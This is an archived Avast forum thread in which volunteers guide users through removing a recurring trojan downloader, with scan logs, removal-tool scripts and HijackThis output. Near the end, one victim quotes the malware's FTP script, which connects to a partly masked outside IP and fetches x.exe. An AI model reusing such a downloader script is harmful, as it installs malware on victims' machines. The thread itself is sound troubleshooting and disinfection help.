Avast WEBforum
Other => Viruses and worms => Topic started by: RZPogi on November 30, 2008, 12:54:56 PM
-
I have been infected by x.exe too many times for a day, about 20 times and it was detected by avast all the time. It is becoming annoying because I can't use the pc smoothly. :(
Also x.exe partners, quicktime.exe, y.exe, csrsc.exe, svchost.exe (fake), and t[1].txt was also detected as Win32:Spyware-gen [trj]
Open.exe, another partner of x.exe, is not detected. I already sent the virus to virus@avast.com
While making this post x.exe was detected again.
I quarantined all of them but they seem to come back and got worse even after a full scan with avast.
I also scanned using spybot and x.exe is detected as smitfraud-C. Malwarebytes found nothing.
cmd.exe runs ftp.exe then ftp.exe downloads open.exe. open.exe downloads quicktime.exe
I made the comodo firewall block quicktime.exe, open.exe, but I was unable to block x.exe because I can't predict when will x.exe strike again.
Where are these malware coming from? ???
Note:I already deleted some of x.exe's because they are already filling up the chest.
-
OK lets remove it using a specialist programme
Download SDFix (http://downloads.andymanchesta.com/RemovalTools/SDFix.exe) and save it to your Desktop.
Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)
Please then reboot your computer in Safe Mode by doing the following :- Restart your computer
- After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
- Instead of Windows loading as normal, the Advanced Options Menu should appear;
- Select the first option, to run Windows in Safe Mode, then press Enter.
- Choose your usual account.
- Open the extracted SDFix folder and double click RunThis.bat to start the script.
- Type Y to begin the cleanup process.
- It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
- Press any Key and it will restart the PC.
- When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
- Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
(Report.txt will also be copied to Clipboard ready for posting back on the forum).
- Finally paste the contents of the Report.txt back on the forum with a new HijackThis log
-
Report.txt contents
SDFix: Version 1.240
Run by Arwine Zapanta on Sun 11/30/2008 at 09:46 PM
Microsoft Windows XP [Version 5.1.2600]
Running From: C:\SDFix
Checking Services :
Restoring Default Security Values
Restoring Default Hosts File
Rebooting
Checking Files :
Trojan Files Found:
C:\WINDOWS\system32\i - Deleted
Removing Temp Files
ADS Check :
Final Check :
catchme 0.3.1361.2 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-11-30 22:06:19
Windows 5.1.2600 Service Pack 3 NTFS
detected NTDLL code modification:
ZwClose
scanning hidden processes ...
scanning hidden services & system hive ...
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sptd\Cfg]
"s1"=dword:2df9c43f
"s2"=dword:110480d0
"h0"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04]
"p0"="C:\Program Files\Alcohol Soft\Alcohol 120\"
"h0"=dword:00000000
"ujdew"=hex:a5,e1,ea,b6,a6,1f,b0,80,45,12,30,86,f0,4c,22,6d,4b,54,16,17,a2,..
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04]
"p0"="C:\Program Files\Alcohol Soft\Alcohol 120\"
"h0"=dword:00000000
"ujdew"=hex:a5,e1,ea,b6,a6,1f,b0,80,45,12,30,86,f0,4c,22,6d,4b,54,16,17,a2,..
scanning hidden registry entries ...
source file error: C:\Documents and Settings\Rowin Zapanta\ntuser.dat
scanning hidden files ...
scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0
Remaining Services :
Authorized Application Key Export:
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"="C:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\\Program Files\\Microsoft Office\\Office12\\GROOVE.EXE"="C:\\Program Files\\Microsoft Office\\Office12\\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\\Program Files\\Microsoft Office\\Office12\\ONENOTE.EXE"="C:\\Program Files\\Microsoft Office\\Office12\\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"
"C:\\Program Files\\IEPro\\MiniDM.exe"="C:\\Program Files\\IEPro\\MiniDM.exe:*:Enabled:MiniDM"
"C:\\Program Files\\uTorrent\\uTorrent.exe"="C:\\Program Files\\uTorrent\\uTorrent.exe:*:Enabled:æTorrent"
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"="C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe:*:Enabled:Yahoo! Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"="C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"="C:\\Program Files\\Windows Live\\Messenger\\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"="C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"="C:\\Program Files\\Windows Live\\Messenger\\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"
Remaining Files :
File Backups: - C:\SDFix\backups\backups.zip
Files with Hidden Attributes :
Wed 22 Oct 2008 949,072 A.SHR --- "C:\Program Files\Spybot - Search & Destroy\advcheck.dll"
Mon 15 Sep 2008 1,562,960 A.SHR --- "C:\Program Files\Spybot - Search & Destroy\SDHelper.dll"
Mon 7 Jul 2008 1,429,840 A.SHR --- "C:\Program Files\Spybot - Search & Destroy\SDUpdate.exe"
Mon 7 Jul 2008 4,891,472 A.SHR --- "C:\Program Files\Spybot - Search & Destroy\SpybotSD.exe"
Tue 16 Sep 2008 1,833,296 A.SHR --- "C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe"
Wed 22 Oct 2008 962,896 A.SHR --- "C:\Program Files\Spybot - Search & Destroy\Tools.dll"
Wed 3 May 2006 163,328 ..SHR --- "C:\WINDOWS\system32\flvDX.dll"
Wed 21 Feb 2007 31,232 ..SHR --- "C:\WINDOWS\system32\msfDX.dll"
Mon 17 Dec 2007 27,648 ..SH. --- "C:\WINDOWS\system32\Smab0.dll"
Sun 26 Jun 2005 616,448 ..SHR --- "C:\Program Files\eRightSoft\SUPER\cygwin1.dll"
Wed 22 Jun 2005 45,568 ..SHR --- "C:\Program Files\eRightSoft\SUPER\cygz.dll"
Thu 29 May 2008 72,704 ..SHR --- "C:\Program Files\eRightSoft\SUPER\Setup.exe"
Tue 4 Jun 2002 84,992 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\14_43260.dll"
Tue 4 Jun 2002 44,032 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\28_83260.dll"
Tue 10 Dec 2002 73,766 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\atrc3260.dll"
Tue 10 Dec 2002 65,575 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\cook3260.dll"
Mon 10 Jun 2002 36,864 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\ddnt3260.dll"
Tue 4 Jun 2002 20,480 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\dnet3260.dll"
Tue 10 Dec 2002 102,437 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\drv13260.dll"
Tue 10 Dec 2002 176,165 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\drv23260.dll"
Tue 10 Dec 2002 208,935 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\drv33260.dll"
Tue 10 Dec 2002 217,127 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\drv43260.dll"
Mon 10 Jun 2002 40,448 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\dspr3260.dll"
Sun 4 Nov 2001 225,280 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\ivvideo.dll"
Tue 10 Apr 2001 225,280 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\qtmlClient.dll"
Fri 20 Feb 2004 232,960 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\raac.dll"
Mon 10 Jun 2002 525,824 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\rnco3260.dll"
Tue 10 Dec 2002 245,805 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\rnlt3260.dll"
Tue 10 Dec 2002 45,093 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\rv103260.dll"
Tue 10 Dec 2002 98,341 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\rv203260.dll"
Tue 10 Dec 2002 94,247 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\rv303260.dll"
Tue 10 Dec 2002 90,151 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\rv403260.dll"
Tue 10 Dec 2002 102,439 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\sipr3260.dll"
Mon 10 Jun 2002 49,152 ...HR --- "C:\Program Files\eRightSoft\SUPER\mencoder\tokr3260.dll"
Thu 20 Mar 2008 5,632 ..SHR --- "C:\Program Files\eRightSoft\SUPER\spk\1stRun.exe"
Finished!
-
One more visible one to kill and then a deep look
Please download the OTMoveIt3 by OldTimer (http://oldtimer.geekstogo.com/OTMoveIt3.exe).
- Save it to your desktop.
- Please double-click OTMoveIt3.exe to run it. (Note: If you are running on Vista, right-click on the file and choose Run As Administrator).
- Copy the lines in the codebox below to the clipboard by highlighting ALL of them and pressing CTRL + C (or, after highlighting, right-click and choose Copy):
:Files
C:\WINDOWS\system32\Smab0.dll
:Commands
[purity]
[emptytemp]
- Return to OTMoveIt3, right click in the "Paste Instructions for Items to be Moved" window (under the yellow bar) and choose Paste.
- Click the red Moveit! button.
- Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of them and pressing CTRL + C (or, after highlighting, right-click and choose copy), and paste it in your next reply.
- Close OTMoveIt3
Note: If a file or folder cannot be moved immediately you may be asked to reboot the machine to finish the move process. If you are asked to reboot the machine choose Yes. In this case, after the reboot, open Notepad (Start->All Programs->Accessories->Notepad), click File->Open, in the File Name box enter *.log and press the Enter key, navigate to the C:\_OTMoveIt\MovedFiles folder, and open the newest .log file present, and copy/paste the contents of that document back here in your next post.
THEN
To ensure that I get all the information this log will need to be uploaded to Mediafire (http://www.mediafire.com/) and post the sharing link.
Download OTScanit (http://download.bleepingcomputer.com/oldtimer/OTScanIt.exe) to your Desktop and double-click on it to extract the files. It will create a folder named OTScanIt on your desktop.
- Close ALL OTHER PROGRAMS.
- Open the OTScanit folder and double-click on OTScanit.exe to start the program.
- Check the box that says Scan All User Accounts
- Check the Radio button for Rootkit check YES
- Check the Radio buttons for Files/Folders Created Within 90 Days and Files/Folders Modified Within 90 Days
- Under Additional Scans check the following:
- File - Lop Check
- Reg - BotCheck
- File - Additional Folder Scans
- Now click the Run Scan button on the toolbar.
- Let it run unhindered until it finishes.
- When the scan is complete Notepad will open with the report file loaded in it.
- Click the Format menu and make sure that Wordwrap is not checked. If it is then click on it to uncheck it.
-
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:35:10 PM, on 11/30/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.20900)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\COMODO\Firewall\cmdagent.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Task Killer\taskkiller.exe
C:\Program Files\ViOrb\ViOrb.exe
C:\Program Files\Vista Rainbar\Rainmeter.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://aa.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*http://ph.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ph.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://aa.rd.yahoo.com/customize/ie/defaults/su/msgr9/*http://ph.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://aa.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*http://ph.yahoo.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ph.yahoo.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://aa.rd.yahoo.com/customize/ie/defaults/su/msgr9/*http://ph.yahoo.com
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: IE7Pro - {00011268-E188-40DF-A514-835FCD78B1BF} - C:\Program Files\IEPro\iepro.dll
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\siteadvisor\mcieplg.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O2 - BHO: FDMIECookiesBHO Class - {CC59E0F9-7E43-44FA-9FAA-8377850BF205} - C:\Program Files\Free Download Manager\iefdm2.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\siteadvisor\mcieplg.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: StylerToolBar - {D2F8F919-690B-4EA2-9FA7-A203D1E04F75} - C:\Program Files\Styler\TB\StylerTB.dll
O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKCU\..\Run: [Task Killer] C:\Program Files\Task Killer\taskkiller.exe
O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
O4 - HKCU\..\Run: [Vista Rainbar] C:\Program Files\Vista Rainbar\Rainmeter.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user')
O4 - Startup: WinFlip.lnk = C:\Program Files\WinFlip\WinFlip.exe
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Windows &Live Favorites - http://favorites.live.com/quickadd.aspx
O8 - Extra context menu item: Download all with Free Download Manager - file://C:\Program Files\Free Download Manager\dlall.htm
O8 - Extra context menu item: Download selected with Free Download Manager - file://C:\Program Files\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Download video with Free Download Manager - file://C:\Program Files\Free Download Manager\dlfvideo.htm
O8 - Extra context menu item: Download with Free Download Manager - file://C:\Program Files\Free Download Manager\dllink.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: IE7Pro Grab and Drag - {000002a3-84fe-43f1-b958-f2c3ca804f1a} - C:\Program Files\IEPro\iepro.dll
O9 - Extra 'Tools' menuitem: IE7Pro Grab and Drag - {000002a3-84fe-43f1-b958-f2c3ca804f1a} - C:\Program Files\IEPro\iepro.dll
O9 - Extra button: IE7Pro Preferences - {0026439F-A980-4f18-8C95-4F1CBBF9C1D8} - C:\Program Files\IEPro\iepro.dll
O9 - Extra 'Tools' menuitem: IE7Pro Preferences - {0026439F-A980-4f18-8C95-4F1CBBF9C1D8} - C:\Program Files\IEPro\iepro.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MIC273~1\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\siteadvisor\mcieplg.dll
O20 - AppInit_DLLs: C:\WINDOWS\system32\guard32.dll
O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - Unknown owner - C:\Program Files\COMODO\Firewall\cmdagent.exe
O23 - Service: StarWind AE Service (StarWindServiceAE) - Rocket Division Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
O23 - Service: VideoAcceleratorService - Speedbit Ltd. - C:\PROGRA~1\SPEEDB~1\VideoAcceleratorService.exe
--
End of file - 9229 bytes
I had a little problem with firefox so I was not able to post this immediately
-
Did you see my post before you posted the HJT ?
-
yes
-
http://www.mediafire.com/download.php?hz1govdmjom
the link of the OTMoveit3 log file.
-
Could you upload OTScanit as well please
-
http://download88.mediafire.com/m6mmi59rt5hg/21znejqjz2z/OTScanIt.Txt
for the Otscanit
-
Some to remove there and an online scan to get any I missed
Start OTScanit. Copy/Paste the information in the quotebox below into the pane where it says "Paste fix here" and then click the Run Fix button.
[Unregister Dlls]
[Files/Folders - Created Within 90 days]
NY -> i -> %SystemRoot%\System32\i
[Files Created - Additional Folder Scans - Non-Microsoft Only]
NY -> fake virus.exe -> %UserProfile%\Desktop\fake virus.exe
[Files/Folders - Modified Within 90 days]
NY -> i -> %SystemRoot%\System32\i
NY -> Filzip.ini -> %SystemRoot%\Filzip.ini
[Files Modified - Additional Folder Scans - Non-Microsoft Only]
NY -> fake virus.exe -> %UserProfile%\Desktop\fake virus.exe
[Empty Temp Folders]
The fix should only take a very short time. When the fix is completed a message box will popup telling you that it is finished. Click the Ok button and Notepad will open with a log of actions taken during the fix. Post that information back here along with a new Hijackthis log.
I will review the information when it comes back in.
THEN
Download Dr.Web CureIt to the desktop:
ftp://ftp.drweb.com/pub/drweb/cureit/drweb-cureit.exe (http://ftp://ftp.drweb.com/pub/drweb/cureit/drweb-cureit.exe)- Doubleclick the drweb-cureit.exe file and Allow to run the express scan
- This will scan the files currently running in memory and when something is found, click the yes button when it asks you if you want to cure it. This is only a short scan.
- Once the short scan has finished, mark the drives that you want to scan.
- Select all drives. A red dot shows which drives have been chosen.
- Click the green arrow at the right, and the scan will start.
- Click 'Yes to all' if it asks if you want to cure/move the file.
- When the scan has finished, in the menu, click file and choose save report list
- Save the report to your desktop. The report will be called DrWeb.csv
- Close Dr.Web Cureit.
Also let me know of any problems you encountered performing the steps above or any continuing problems you are still having with the computer.
-
http://download218.mediafire.com/ibgblwjzzjyg/hjymd2dmazl/hijackthis2.log
For hijackthis log and
http://download290.mediafire.com/l1bf9h3beztg/imjzm4xvomd/11302008_234513.log
For the new log of OTScanit.
Well, x.exe is still detected, and now with his buddy quicktime.exe. (I had to disable defense+ of comodo because it is interrupting the scan.)
There is an interval when x.exe will show up. When connected to the net and an interval of 5-30 mins.
-
There has been so far no problems.
-
;D bading ka ba? :D ;D :o
-
I do not think that is the sharing link as it is not letting me get the logs. Could you paste the Dr. Web csv file please
-
;D bading ka ba? :D ;D :o
Di ako bading! Trip ko lang.
-
http://www.mediafire.com/download.php?imjzm4xvomd
for new OTScanit log
http://www.mediafire.com/?hjymd2dmazl
for new hijackthis log
DR Web scanner detect sdfix.exe as malware. what is going on?
Also Vista Transformation Pack 9 is also detect as malware. Is this because vtp can modify system files?
Dr. Web is not bad. Scan archives highspeed.
-
Whilst I look at the logsand to put your mind at rest sdfix.exe was reported as it can do good or bad. In our case it is good
-
The logs look OK are you still getting alerts ?
-
Dr. Web isn't done yet but it picked up t[1].txt and recognized as Win.irc.worm.virus
t[1].exe is partner of x.exe
x.exe might be a bot.
the alerts only appear when dr. web finds malware that is a partner of x.exe
-
That will be as it opens them to see what they are
-
Since defense+ banned ftp.exe from downloading quicktime.exe, every 4-15 seconds comodo firewall blocks almost 700 intrusion attempts since midnight(my place). :o :o
Those blocks are similar all UDP and goes to port 50213 (The same port I use for utorrent). I might got x.exe from using utorrent. Should I change the port of utorrent or temporarily stop using utorrent for a while? ??? ???
-
That is the source of your problems yes. As fast as the problems are cleared more keep coming
Lets try Combofix as that is a lot stronger and from that I may be able to detect and kill the driver/service that is downloading
Download Combofix from any of the links below. You must rename it before saving it. Save it to your desktop.
Link 1 (http://subs.geekstogo.com/ComboFix.exe)
Link 2 (http://download.bleepingcomputer.com/sUBs/ComboFix.exe)
Link 3 (http://www.forospyware.com/sUBs/ComboFix.exe)
(http://i266.photobucket.com/albums/ii277/sUBs_/combofix/CF_download_FF.gif)
(http://i266.photobucket.com/albums/ii277/sUBs_/combofix/CF_download_rename.gif)
--------------------------------------------------------------------
Double click on Combo-Fix.exe & follow the prompts.
- When finished, it will produce a report for you.
- Please post the C:\ComboFix.txt along with a HijackThis log so we can continue cleaning the system.
-
should I stop dr. web? It is still not done with full scan.
-
I thought it had, no complete dr web then run combofix
-
ok,
Earlier, I was suddenly disconnected from the net. All the connections to the malware distributors are gone. It might resume if utorrent is started
-
Was that when combofix was running as it will do that
-
Nope, while waiting for dr web to finish
-
Is it still running, you must have a large hard drive ;D
-
Quite and I have a lot of archives because of the many games installed in my pc.
-
http://www.mediafire.com/download.php?uztmmig2yjn
for the dr web results.
I got asleep while waiting for dr. web to finish.
Most of the results are related to vtp.
-
http://www.mediafire.com/download.php?mni4nioljz2
for new hijackthis log
http://www.mediafire.com/download.php?jtyjy2dqymn
for combo-fix log
x.exe is still detected and that "i" trojan detected by sdfix is back and multiple IPs are blocked again at 50213.
I should change the port of utorrent.
-
Yes I would recommend changing the port
1. Please download The Avenger2 (http://swandog46.geekstogo.com/avenger2/download.php) by Swandog46 to your Desktop.- Right click on the Avenger.zip folder and select "Extract All..."
- Follow the prompts and extract the avenger folder to your desktop
2. Copy all the text contained in the code box below to your Clipboard by highlighting it and pressing (Ctrl+C):
Begin copying here:
Files to replace with dummy:
c:\windows\system32\i
Files to delete:
c:\windows\IFinst27.exe
c:\windows\system32\Uharc.exe
c:\windows\system32\reico.exe
Note: the above code was created specifically for this user. If you are not this user, do NOT follow these directions as they could damage the workings of your system.
3. Now, open the avenger folder and start The Avenger program by clicking on its icon.
- Right click on the window under Input script here:, and select Paste.
- You can also Paste the text copied to the clipboard into this window by pressing (Ctrl+V), or click on the third button under the menu to paste it from the clipboard.
- Click on Execute
- Answer "Yes" twice when prompted.
4. The Avenger will automatically do the following:- It will Restart your computer. ( In cases where the code to execute contains "Drivers to Delete" or "Drivers to Disable", The Avenger will actually restart your system twice.)
- After the restart, it creates a log file that should open with the results of Avenger’s actions. This log file will be located at C:\avenger.txt
- The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.
5. Please copy/paste the content of c:\avenger.txt into your reply along with a fresh Hijackthis log .
-
I am having a problem with the same files...
-
Hi all,
I have also the same problem with "x.exe" and "quicktime.exe" located at system32 level; there's also a file called "I". When I open this file I've the following instructions in it
-------------
open 212.xxx.xxx.xx 2755
user 1 1
get x.exe
quit
------------
The "get x.exe" is sometimes changed with "get y.exe"; only when the x.exe already exists.
The DwdnolleE.dll has also been found by avast in my temp files (I don't know if it is related or not?)
I've tried all the solutions mentioned above but the x.exe still reappear together with the "I" file.
If s.o. has an idea to solve this problem I'm at your disposal to give you logs, reports or whatever you need, I want to get rid of it because I'm stuck ??? :'(
tx Nico
-
